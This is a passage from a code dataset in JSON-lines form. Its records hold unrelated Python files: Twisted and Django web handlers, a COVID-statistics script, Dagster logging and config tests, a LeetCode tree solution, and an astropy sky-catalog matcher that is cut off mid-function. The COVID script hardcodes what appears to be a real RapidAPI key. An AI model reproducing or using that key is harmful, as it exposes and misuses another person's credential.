needs to be used very carefully, with confirmation on the client side, as it deletes the\r\n current node completely\r\n \"\"\"\r\n r=ResponseGenerator(request,status=200,rootUri=self.rootUri) \r\n d=RequestParser(request,\"node\",self.valid_contentTypes,self.validGetParams).ValidateAndParseParams() \r\n d.addCallbacks(lambda params:self.environmentManager.get_environment(self.envId).delete_node(self.nodeId),errback=r._build_response) \r\n d.addBoth(r._build_response)\r\n request._call=reactor.callLater(0,d.callback,None)\r\n return NOT_DONE_YET ", "repo_name": "kaosat-dev/Pollapli", "sub_path": "pollapli/core/interface/rest/handlers/node_handlers.py", "file_name": "node_handlers.py", "file_ext": "py", "file_size_in_byte": 6704, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pollapli.core.interface.rest.handlers.default_rest_handler.DefaultRestHandler", "line_number": 19, "usage_type": "name"}, {"api_name": "pollapli.core.interface.rest.handlers.default_rest_handler.DefaultRestHandler.__init__", "line_number": 28, "usage_type": "call"}, {"api_name": "pollapli.core.interface.rest.handlers.default_rest_handler.DefaultRestHandler", "line_number": 28, "usage_type": "name"}, {"api_name": "twisted.web.resource.NoResource", "line_number": 41, "usage_type": "call"}, {"api_name": "pollapli.core.interface.rest.response_generator.ResponseGenerator", "line_number": 49, "usage_type": "call"}, {"api_name": "pollapli.core.interface.rest.request_parser.RequestParser", "line_number": 50, "usage_type": "call"}, {"api_name": "twisted.internet.reactor.callLater", "line_number": 53, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 53, "usage_type": "name"}, {"api_name": "twisted.web.server.NOT_DONE_YET", "line_number": 54, "usage_type": "name"}, {"api_name": "pollapli.core.interface.rest.response_generator.ResponseGenerator", "line_number": 60, "usage_type": "call"}, {"api_name": "pollapli.core.interface.rest.request_parser.RequestParser", "line_number": 61, "usage_type": "call"}, {"api_name": "twisted.internet.reactor.callLater", "line_number": 64, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 64, "usage_type": "name"}, {"api_name": "twisted.web.server.NOT_DONE_YET", "line_number": 65, "usage_type": "name"}, {"api_name": "pollapli.core.interface.rest.response_generator.ResponseGenerator", "line_number": 75, "usage_type": "call"}, {"api_name": "pollapli.core.interface.rest.request_parser.RequestParser", "line_number": 76, "usage_type": "call"}, {"api_name": "twisted.internet.reactor.callLater", "line_number": 79, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 79, "usage_type": "name"}, {"api_name": "twisted.web.server.NOT_DONE_YET", "line_number": 80, "usage_type": "name"}, {"api_name": "pollapli.core.interface.rest.handlers.default_rest_handler.DefaultRestHandler", "line_number": 85, "usage_type": "name"}, {"api_name": "pollapli.core.interface.rest.handlers.default_rest_handler.DefaultRestHandler.__init__", "line_number": 88, "usage_type": "call"}, {"api_name": "pollapli.core.interface.rest.handlers.default_rest_handler.DefaultRestHandler", "line_number": 88, "usage_type": "name"}, {"api_name": "twisted.python.log.PythonLoggingObserver", "line_number": 89, "usage_type": "call"}, {"api_name": "twisted.python.log", "line_number": 89, "usage_type": "name"}, {"api_name": 
"pollapli.core.interface.rest.handlers.driver_handlers.DriverHandler", "line_number": 95, "usage_type": "call"}, {"api_name": "pollapli.core.interface.rest.response_generator.ResponseGenerator", "line_number": 102, "usage_type": "call"}, {"api_name": "pollapli.core.interface.rest.request_parser.RequestParser", "line_number": 103, "usage_type": "call"}, {"api_name": "twisted.internet.reactor.callLater", "line_number": 106, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 106, "usage_type": "name"}, {"api_name": "twisted.web.server.NOT_DONE_YET", "line_number": 107, "usage_type": "name"}, {"api_name": "pollapli.core.interface.rest.response_generator.ResponseGenerator", "line_number": 113, "usage_type": "call"}, {"api_name": "pollapli.core.interface.rest.request_parser.RequestParser", "line_number": 114, "usage_type": "call"}, {"api_name": "twisted.internet.reactor.callLater", "line_number": 118, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 118, "usage_type": "name"}, {"api_name": "twisted.web.server.NOT_DONE_YET", "line_number": 119, "usage_type": "name"}, {"api_name": "pollapli.core.interface.rest.response_generator.ResponseGenerator", "line_number": 127, "usage_type": "call"}, {"api_name": "pollapli.core.interface.rest.request_parser.RequestParser", "line_number": 128, "usage_type": "call"}, {"api_name": "twisted.internet.reactor.callLater", "line_number": 131, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 131, "usage_type": "name"}, {"api_name": "twisted.web.server.NOT_DONE_YET", "line_number": 132, "usage_type": "name"}]}
+{"seq_id": "13627853316", "text": "from django.urls import path\nfrom .views import points,create,point,edit_place,delete_place,FeedBackView,FeedBackDetailView\n\nurlpatterns = [\n path('', points, name= 'points-list'),\n path('create/', create, name='create-point'),\n path ('/', point, name = 'point'),\n path ('/edit/',edit_place, name = 'edit-place'),\n path ('/delete/',delete_place, name = 'delete-place'),\n path ('feedback/', FeedBackView.as_view(), name= 'feedback' ),\n path ('feedback/', FeedBackDetailView.as_view(), name='feedback-detail')\n\n]", "repo_name": "perizat1234/intourist", "sub_path": "points/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 563, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "views.points", "line_number": 5, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "views.create", "line_number": 6, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "views.point", "line_number": 7, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "views.edit_place", "line_number": 8, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "views.delete_place", "line_number": 9, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "views.FeedBackView.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "views.FeedBackView", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "views.FeedBackDetailView.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "views.FeedBackDetailView", "line_number": 11, "usage_type": "name"}]}
+{"seq_id": "17601994800", "text": "#!/bin/env python3\nprint(\"Content-Type: text/html\")\nprint()\n\nimport requests, time, sys, json\n\nurl = \"https://covid-193.p.rapidapi.com/statistics\"\n\nquerystring = {\"country\": \"Myanmar\"}\n\nheaders = {\n 'x-rapidapi-host': \"covid-193.p.rapidapi.com\",\n 'x-rapidapi-key': \"bc48047875mshf4d1668b9910304p1eeff8jsn109f6bb01cc3\"\n }\nrequest = requests.get(url, headers=headers, params=querystring)\nif request.status_code == 200:\n\tresponse = json.loads(request.text)\n\tf = open('home.106a6c241b8797f52e1e77317b96a201.html', 'r').read()\n\tprint(f.format(results=response['results'],country=response['parameters']['country'], cases_total=response['response'][0]['cases']['total'], cases_recovered=response['response'][0]['cases']['recovered'], cases_critical=response['response'][0]['cases']['critical'], cases_new=response['response'][0]['cases']['new'], cases_active=response['response'][0]['cases']['active'],deaths_new=response['response'][0]['deaths']['new'], deaths_total=response['response'][0]['deaths']['total'], date=response['response'][0]['day'], year=time.strftime(\"%Y\")))", "repo_name": "4cc3ssX/4Covid", "sub_path": "covid/index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 1077, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 15, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 17, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "13020467458", "text": "import pytest\nfrom tests.testbase import *\n\n\nclass TestSuite:\n # * Este es otro ejemplo de Suite usando otro Fixture y con más de un caso de Prueba:\n\n @pytest.fixture\n def precondition(self, setWebDriver: WebDriver):\n global web, get\n web = setWebDriver\n get = Locators(web)\n\n get.page(\"https://www.selenium.dev/selenium/web/web-form.html\")\n title = web.title\n assert title == \"Web form\"\n\n yield\n web.quit()\n\n def test_TC1_FirstExample(self, precondition):\n\n textBox = get.bySelector(\"[name='my-text']\")\n submitButton = get.bySelector(\"[type='submit']\")\n textBox.send_keys(\"Selenium\")\n submitButton.click()\n message = get.byID(\"message\")\n value = message.text\n assert value == \"Received!\"\n\n def test_TC2_SecondExample(self, precondition):\n\n textBox = get.bySelector(\"[name='my-text']\")\n submitButton = get.bySelector(\"[type='submit']\")\n textBox.send_keys(\"UPEX\")\n submitButton.click()\n message = get.byID(\"message\")\n value = message.text\n assert value == \"Received!\"\n\n\nif __name__ == '__main__':\n pytest.main()\n", "repo_name": "upex-galaxy/selenium-python", "sub_path": "tests/how_to/test_tutorial_fixture2.py", "file_name": "test_tutorial_fixture2.py", "file_ext": "py", "file_size_in_byte": 1184, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest.fixture", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pytest.main", "line_number": 43, "usage_type": "call"}]}
+{"seq_id": "4706164457", "text": "import logging\nimport sys\nimport time\nfrom datetime import datetime, timezone\n\nimport simplejson as json\nfrom termcolor import colored\n\n\nclass ColorfulFormatter(logging.Formatter):\n converter = time.gmtime\n\n palette = {\n logging.DEBUG: \"blue\",\n logging.INFO: \"white\",\n logging.WARNING: \"cyan\",\n logging.ERROR: \"red\",\n logging.CRITICAL: \"magenta\",\n }\n\n is_tty = sys.stderr.isatty()\n\n def format(self, record):\n s = super().format(record)\n return colored(s, color=self.palette.get(record.levelno)) if self.is_tty else s\n\n\nclass JsonFormatter(logging.Formatter):\n\n converter = time.gmtime\n\n def __init__(self, environment: str, etl_id: str):\n super().__init__()\n self.environment = environment\n self.etl_id = etl_id\n\n def as_utc_iso8601(self, ts) -> str:\n return (\n datetime.fromtimestamp(ts, timezone.utc)\n .isoformat(\"T\", timespec=\"milliseconds\")\n .replace(\"+00:00\", \"Z\")\n )\n\n def format(self, record: logging.LogRecord) -> str:\n \"\"\"Format log record by creating a JSON-format in a string.\"\"\"\n values = {\n \"application_name\": \"arthur-etl\",\n \"environment\": self.environment,\n \"gmtime\": self.as_utc_iso8601(record.created),\n \"etl_id\": self.etl_id,\n \"log_level\": record.levelname,\n \"log_severity\": record.levelno,\n \"logger\": record.name,\n \"message\": record.getMessage(),\n \"process.id\": record.process,\n \"process.name\": record.processName,\n \"source.filename\": record.filename,\n \"source.function\": record.funcName,\n \"source.line_number\": record.lineno,\n \"source.module\": record.module,\n \"source.pathname\": record.pathname,\n \"thread.name\": record.threadName,\n \"timestamp\": int(record.created * 1000.0),\n }\n # Always add metrics if any are present.\n if hasattr(record, \"metrics\"):\n values[\"metrics\"] = record.metrics # type: ignore\n # Always add exception (value) as a field if exception info is present.\n if record.exc_info is not None and isinstance(record.exc_info, tuple):\n values[\"exception.class\"] = record.exc_info[1].__class__.__name__\n values[\"exception.message\"] = str(record.exc_info[1])\n # Always add formatted exception to message if exception info is present.\n if record.exc_text is not None:\n if values[\"message\"] != \"\\n\":\n values[\"message\"] += \"\\n\" # type: ignore\n values[\"message\"] += record.exc_text # type: ignore\n return json.dumps(values, default=str, separators=(\",\", \":\"), sort_keys=True)\n", "repo_name": "harrystech/arthur-redshift-etl", "sub_path": "python/etl/logs/formatter.py", "file_name": "formatter.py", "file_ext": "py", "file_size_in_byte": 2778, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 25, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.Formatter", "line_number": 10, "usage_type": "attribute"}, {"api_name": "time.gmtime", "line_number": 11, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 14, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 15, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 16, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 17, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.stderr.isatty", "line_number": 21, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 21, "usage_type": "attribute"}, {"api_name": "termcolor.colored", "line_number": 25, "usage_type": 
"call"}, {"api_name": "logging.Formatter", "line_number": 28, "usage_type": "attribute"}, {"api_name": "time.gmtime", "line_number": 30, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 39, "usage_type": "name"}, {"api_name": "datetime.timezone.utc", "line_number": 39, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 39, "usage_type": "name"}, {"api_name": "logging.LogRecord", "line_number": 44, "usage_type": "attribute"}, {"api_name": "simplejson.dumps", "line_number": 77, "usage_type": "call"}]}
+{"seq_id": "38017147195", "text": "from django.shortcuts import redirect, render\nfrom employe.models import Employee\nfrom employe.forms import EmployeeForm\nfrom django.contrib import messages\n\n\n# Create your views here.\n\n\ndef Emp(request):\n if request.method == \"POST\":\n form = EmployeeForm(request.POST)\n if form.is_valid():\n try:\n form.save()\n messages.success(request, \"Successfully Added\")\n return redirect(\"/show\")\n except:\n pass\n else:\n form = EmployeeForm()\n return render(request, 'index.html', {'form': form})\n\n\ndef show(request):\n employee = Employee.objects.all()\n return render(request, 'show.html', {'employee': employee})\n\n\ndef edit(request, id):\n employee = Employee.objects.get(id=id)\n return render(request, 'edit.html', {'employee': employee})\n\n\ndef update(request, id):\n employee = Employee.objects.get(id=id)\n form = EmployeeForm(request.POST, instance=employee)\n if form.is_valid():\n form.save()\n return redirect(\"/show\")\n else:\n form = EmployeeForm()\n return render(request, 'edit.html', {'form': form})\n\n\ndef delete(request, id):\n employee = Employee.objects.get(id=id)\n employee.delete()\n return redirect(\"/show\")\n", "repo_name": "shnt007/HR_Mgmt", "sub_path": "human_resources/employe/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1272, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "employe.forms.EmployeeForm", "line_number": 12, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 16, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 16, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 17, "usage_type": "call"}, {"api_name": "employe.forms.EmployeeForm", "line_number": 21, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 22, "usage_type": "call"}, {"api_name": "employe.models.Employee.objects.all", "line_number": 26, "usage_type": "call"}, {"api_name": "employe.models.Employee.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "employe.models.Employee", "line_number": 26, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 27, "usage_type": "call"}, {"api_name": "employe.models.Employee.objects.get", "line_number": 31, "usage_type": "call"}, {"api_name": "employe.models.Employee.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "employe.models.Employee", "line_number": 31, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 32, "usage_type": "call"}, {"api_name": "employe.models.Employee.objects.get", "line_number": 36, "usage_type": "call"}, {"api_name": "employe.models.Employee.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "employe.models.Employee", "line_number": 36, "usage_type": "name"}, {"api_name": "employe.forms.EmployeeForm", "line_number": 37, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 40, "usage_type": "call"}, {"api_name": "employe.forms.EmployeeForm", "line_number": 42, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "employe.models.Employee.objects.get", "line_number": 47, "usage_type": "call"}, {"api_name": "employe.models.Employee.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "employe.models.Employee", "line_number": 47, "usage_type": 
"name"}, {"api_name": "django.shortcuts.redirect", "line_number": 49, "usage_type": "call"}]}
+{"seq_id": "9889705577", "text": "import os\nimport sys\nfrom typing import TYPE_CHECKING, Dict, List, Optional\n\nfrom dagster import Config, Field, job, op\nfrom dagster._config.field import resolve_to_config_type\nfrom dagster._config.snap import ConfigSchemaSnapshot, snap_from_config_type\nfrom dagster._core.definitions.definitions_class import Definitions\nfrom dagster._core.host_representation import InProcessCodeLocationOrigin\nfrom dagster._core.snap.snap_to_yaml import default_values_yaml_from_type_snap\nfrom dagster._core.types.loadable_target_origin import LoadableTargetOrigin\n\nif TYPE_CHECKING:\n from dagster._core.host_representation.external import ExternalJob\n\n\ndef test_basic_default():\n snap = snap_from_config_type(resolve_to_config_type({\"a\": Field(str, \"foo\")}))\n yaml_str = default_values_yaml_from_type_snap(ConfigSchemaSnapshot({}), snap)\n assert yaml_str == \"a: foo\\n\"\n\n\ndef test_basic_no_nested_fields():\n snap = snap_from_config_type(resolve_to_config_type(str))\n yaml_str = default_values_yaml_from_type_snap(ConfigSchemaSnapshot({}), snap)\n assert yaml_str == \"{}\\n\"\n\n\ndef test_with_spaces():\n snap = snap_from_config_type(resolve_to_config_type({\"a\": Field(str, \"with spaces\")}))\n yaml_str = default_values_yaml_from_type_snap(ConfigSchemaSnapshot({}), snap)\n assert yaml_str == \"a: with spaces\\n\"\n\n\ndef external_repository_for_function(fn):\n return external_repository_for_module(fn.__module__, fn.__name__)\n\n\ndef external_repository_for_module(module_name, attribute=None, repository_name=\"__repository__\"):\n loadable_target_origin = LoadableTargetOrigin(\n executable_path=sys.executable,\n module_name=module_name,\n working_directory=os.getcwd(),\n attribute=attribute,\n )\n\n location = InProcessCodeLocationOrigin(\n loadable_target_origin=loadable_target_origin, location_name=module_name\n ).create_location()\n\n return location.get_repository(repository_name)\n\n\ndef trivial_job_defs():\n @op\n def an_op():\n pass\n\n @job\n def a_job():\n an_op()\n\n return Definitions(jobs=[a_job])\n\n\ndef test_print_root() -> None:\n external_repository = external_repository_for_function(trivial_job_defs)\n external_a_job: ExternalJob = external_repository.get_full_external_job(\"a_job\")\n root_config_key = external_a_job.root_config_key\n assert root_config_key\n root_type = external_a_job.config_schema_snapshot.get_config_snap(root_config_key)\n assert (\n default_values_yaml_from_type_snap(external_a_job.config_schema_snapshot, root_type)\n == \"{}\\n\"\n )\n\n\ndef job_def_with_config():\n class MyOpConfig(Config):\n a_str_with_default: str = \"foo\"\n optional_int: Optional[int] = None\n a_str_no_default: str\n\n @op\n def an_op(config: MyOpConfig):\n pass\n\n @job\n def a_job():\n an_op()\n\n return Definitions(jobs=[a_job])\n\n\ndef test_print_root_op_config() -> None:\n external_repository = external_repository_for_function(job_def_with_config)\n external_a_job: ExternalJob = external_repository.get_full_external_job(\"a_job\")\n root_config_key = external_a_job.root_config_key\n assert root_config_key\n root_type = external_a_job.config_schema_snapshot.get_config_snap(root_config_key)\n assert (\n default_values_yaml_from_type_snap(external_a_job.config_schema_snapshot, root_type)\n == \"\"\"ops:\n an_op:\n config:\n a_str_with_default: foo\n\"\"\"\n )\n\n\ndef job_def_with_complex_config():\n class MyNestedConfig(Config):\n a_default_int: int = 1\n\n class MyOpConfig(Config):\n nested: MyNestedConfig\n my_list: List[Dict[str, 
int]] = [{\"foo\": 1, \"bar\": 2}]\n\n @op\n def an_op(config: MyOpConfig):\n pass\n\n @job\n def a_job():\n an_op()\n\n return Definitions(jobs=[a_job])\n\n\ndef test_print_root_complex_op_config() -> None:\n external_repository = external_repository_for_function(job_def_with_complex_config)\n external_a_job: ExternalJob = external_repository.get_full_external_job(\"a_job\")\n root_config_key = external_a_job.root_config_key\n assert root_config_key\n root_type = external_a_job.config_schema_snapshot.get_config_snap(root_config_key)\n assert (\n default_values_yaml_from_type_snap(external_a_job.config_schema_snapshot, root_type)\n == \"\"\"ops:\n an_op:\n config:\n my_list:\n - bar: 2\n foo: 1\n nested:\n a_default_int: 1\n\"\"\"\n )\n", "repo_name": "dagster-io/dagster", "sub_path": "python_modules/dagster/dagster_tests/core_tests/snap_tests/test_snap_to_yaml.py", "file_name": "test_snap_to_yaml.py", "file_ext": "py", "file_size_in_byte": 4440, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8986, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.TYPE_CHECKING", "line_number": 13, "usage_type": "name"}, {"api_name": "dagster._config.snap.snap_from_config_type", "line_number": 18, "usage_type": "call"}, {"api_name": "dagster._config.field.resolve_to_config_type", "line_number": 18, "usage_type": "call"}, {"api_name": "dagster.Field", "line_number": 18, "usage_type": "call"}, {"api_name": "dagster._core.snap.snap_to_yaml.default_values_yaml_from_type_snap", "line_number": 19, "usage_type": "call"}, {"api_name": "dagster._config.snap.ConfigSchemaSnapshot", "line_number": 19, "usage_type": "call"}, {"api_name": "dagster._config.snap.snap_from_config_type", "line_number": 24, "usage_type": "call"}, {"api_name": "dagster._config.field.resolve_to_config_type", "line_number": 24, "usage_type": "call"}, {"api_name": "dagster._core.snap.snap_to_yaml.default_values_yaml_from_type_snap", "line_number": 25, "usage_type": "call"}, {"api_name": "dagster._config.snap.ConfigSchemaSnapshot", "line_number": 25, "usage_type": "call"}, {"api_name": "dagster._config.snap.snap_from_config_type", "line_number": 30, "usage_type": "call"}, {"api_name": "dagster._config.field.resolve_to_config_type", "line_number": 30, "usage_type": "call"}, {"api_name": "dagster.Field", "line_number": 30, "usage_type": "call"}, {"api_name": "dagster._core.snap.snap_to_yaml.default_values_yaml_from_type_snap", "line_number": 31, "usage_type": "call"}, {"api_name": "dagster._config.snap.ConfigSchemaSnapshot", "line_number": 31, "usage_type": "call"}, {"api_name": "dagster._core.types.loadable_target_origin.LoadableTargetOrigin", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 43, "usage_type": "call"}, {"api_name": "dagster._core.host_representation.InProcessCodeLocationOrigin", "line_number": 47, "usage_type": "call"}, {"api_name": "dagster.op", "line_number": 55, "usage_type": "name"}, {"api_name": "dagster.job", "line_number": 59, "usage_type": "name"}, {"api_name": "dagster._core.definitions.definitions_class.Definitions", "line_number": 63, "usage_type": "call"}, {"api_name": "dagster._core.host_representation.external.ExternalJob", "line_number": 68, "usage_type": "name"}, {"api_name": "dagster._core.snap.snap_to_yaml.default_values_yaml_from_type_snap", "line_number": 73, "usage_type": "call"}, {"api_name": "dagster.Config", "line_number": 79, "usage_type": "name"}, 
{"api_name": "typing.Optional", "line_number": 81, "usage_type": "name"}, {"api_name": "dagster.op", "line_number": 84, "usage_type": "name"}, {"api_name": "dagster.job", "line_number": 88, "usage_type": "name"}, {"api_name": "dagster._core.definitions.definitions_class.Definitions", "line_number": 92, "usage_type": "call"}, {"api_name": "dagster._core.host_representation.external.ExternalJob", "line_number": 97, "usage_type": "name"}, {"api_name": "dagster._core.snap.snap_to_yaml.default_values_yaml_from_type_snap", "line_number": 102, "usage_type": "call"}, {"api_name": "dagster.Config", "line_number": 112, "usage_type": "name"}, {"api_name": "dagster.Config", "line_number": 115, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 117, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 117, "usage_type": "name"}, {"api_name": "dagster.op", "line_number": 119, "usage_type": "name"}, {"api_name": "dagster.job", "line_number": 123, "usage_type": "name"}, {"api_name": "dagster._core.definitions.definitions_class.Definitions", "line_number": 127, "usage_type": "call"}, {"api_name": "dagster._core.host_representation.external.ExternalJob", "line_number": 132, "usage_type": "name"}, {"api_name": "dagster._core.snap.snap_to_yaml.default_values_yaml_from_type_snap", "line_number": 137, "usage_type": "call"}]}
+{"seq_id": "4241746656", "text": "from typing import Optional\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def hight(self, root: TreeNode):\n if root == None:\n return 0\n return max(self.hight(root.left), self.hight(root.right)) + 1\n\n def isBalanced(self, root: Optional[TreeNode]) -> bool:\n if root == None:\n return True\n\n lh = self.hight(root.left)\n rh = self.hight(root.right)\n\n if (\n abs(lh - rh) < 2\n and self.isBalanced(root.left) is True\n and self.isBalanced(root.right) is True\n ):\n return True\n\n return False\n", "repo_name": "inoob26/leetcode", "sub_path": "problems/110.Balanced Binary Tree/solution.py", "file_name": "solution.py", "file_ext": "py", "file_size_in_byte": 767, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.Optional", "line_number": 17, "usage_type": "name"}]}
+{"seq_id": "69984420010", "text": "import numpy as np\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\nfrom matplotlib import rc\nfrom matplotlib.ticker import FormatStrFormatter\nfrom scipy.stats import median_abs_deviation as mad\nfrom scipy.optimize import curve_fit\n \n\ndef cat_sky_match(raref, decref, rain, decin, septol, **kwargs):\n\n '''Written by Gregory Rudnick 9 January 2018\n\n PURPOSE:\n\n Take two lists of ra and dec coordinates in the same units and match\n them within some tolerance.\n\n Plot the differences in each coordinate.\n\n INPUT PARAMETERS:\n\n raref, decref: the reference coordinates in degrees. Numpy arrays.\n\n rain, decin: the input coordinates in degrees. If performing\n coordinate transforms, these would be the ones to be transformed.\n Numpy arrays\n\n septol: the maximum separation allowed for a match. Units are\n arcseconds\n\n OPTIONAL KEYWORD PARAMETERS\n\n matchfile: a name of the file that will contain the reference and\n input coordinates. Suitable for geomap input.\n\n OUTPUT\n\n arrays containing row-matched ras and decs of the reference and input\n coordinates that fall with septol\n\n '''\n\n refcat = SkyCoord(ra=raref*u.degree, dec=decref*u.degree)\n incat = SkyCoord(ra=rain*u.degree, dec=decin*u.degree)\n \n #match catalogs\n (idx, d2d, d3d) = refcat.match_to_catalog_sky(incat)\n #convert distance to arcseconds\n #d2d = d2d*3600\n\n #print(idx,d2d)\n \n #select close matches\n iclose = np.where(d2d < septol/3600.*u.deg)\n #convert tuple to pure array\n iclose=iclose[0]\n\n #print(d2d[indx])\n #print(np.column_stack((raref[iclose],rain[idx[iclose]],d2d[iclose]/u.deg*3600.)))\n\n\n #write files only if \"matchfile\" keyword is set\n keys = sorted(kwargs.keys())\n for kw in keys:\n if kw == 'matchfile':\n #print(kwargs[kw])\n #open file for writing and write a header\n fo = open(kwargs[kw], \"w\")\n fo.write(\"# raref decref rain decin\\n\")\n for i,val in enumerate(iclose):\n #print(i,iclose[i])\n #print(raref[iclose[i]],decref[iclose[i]],rain[idx[iclose[i]]],decin[idx[iclose[i]]])\n fo.write('{} {} {} {}\\n'.format(raref[iclose[i]],decref[iclose[i]],rain[idx[iclose[i]]],decin[idx[iclose[i]]]))\n fo.close()\n\n print(\"RA for matching pairs in spectro catalog\")\n print(raref[iclose])\n print(\"DEC for matching pairs in spectro catalog\")\n print(decref[iclose])\n #store the limits of the coordinates\n lims = {'ramax' : np.amax(raref[iclose]), 'ramin' : np.amin(raref[iclose]), 'decmax' : np.amax(decref[iclose]), 'decmin' : np.amin(decref[iclose])}\n \n #return all matches within the tolerance\n return raref[iclose], decref[iclose], rain[idx[iclose]], decin[idx[iclose]], lims\n\n\n\ndef match_diff_sky_plot(rarefm, decrefm, rainm, decinm, detrend = False, **kwargs):\n\n import matplotlib.pyplot as plt\n\n '''PURPOSE: Plot panels of differences in ra and dec for a set of\n matched catalogs.\n\n INPUT PARAMETERS:\n\n rarefm, decrefm, rainm, decinm: A set of coordinates for matched\n objects. These arrays must all be the same length.\n\n OPTIONAL KEWORD PARAMETERS\n\n plotfile: the name of the file containing the plot\n\n ramin, ramax, decmin, decmax. These are the limits over which the\n transform was originally computed. If these are given then it\n uses those limits to color the points in the ra and decdiff plots.\n If one is given, all must be given.\n\n detrend: Default - False. 
If True, subtract the best fit line\r\n from the data and recompute statistics\n\n OUTPUT:\n\n a plot of the differences between the RA and DEC coordinates\n\n '''\n\n #set LaTeX fonts for labels\n rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n rc('text', usetex=True)\n\n \n lims = {'ramax' : np.amax(rarefm), 'ramin' : np.amin(rarefm), 'decmax' : np.amax(decrefm), 'decmin' : np.amin(decrefm)}\n print(\"plotlims are \",lims)\n\n padfac = 0.001\n radiff = (rarefm - rainm)*3600.\n decdiff = (decrefm - decinm)*3600.\n #f, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, sharex='col', sharey='row')\n ralims = [lims['ramin'] - 2./60., lims['ramax'] + 2./60.]\n #ralims = [lims['ramin'] * (1. - padfac), lims['ramax'] * (1. + padfac)]\n\n #handles how to do padding if DECs are positive or negative\n if lims['decmin'] < 0:\n declims = [lims['decmin'] * (1. + padfac/10.), lims['decmax'] * (1. - padfac/10.)]\n else:\n declims = [lims['decmin'] * (1. - padfac/10.), lims['decmax'] * (1. + padfac/10.)]\n yline = [0,0]\n yline1 = [-0.1, -0.1]\n yline2 = [0.1, 0.1]\n\n #finds source outside of ra and dec lims. Assumes that if one\n #keyword is given that all are given\n if 'ramin' in kwargs.keys():\n #use boolean masks (not np.where index tuples) so they can be\n #combined with & when building ifit/inofit below\n iin = (rarefm >= kwargs['ramin']) & (rarefm <= kwargs['ramax']) & \\\n (decrefm >= kwargs['decmin']) & (decrefm <= kwargs['decmax'])\n iout = ((rarefm < kwargs['ramin']) | (rarefm > kwargs['ramax'])) | \\\n ((decrefm < kwargs['decmin']) | (decrefm > kwargs['decmax']))\n \n plt.clf()\n f, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2,figsize=(10,10))\n\n #plot limits\n ypmax = 1.0\n ypmin = -1.0\n nsig_rej 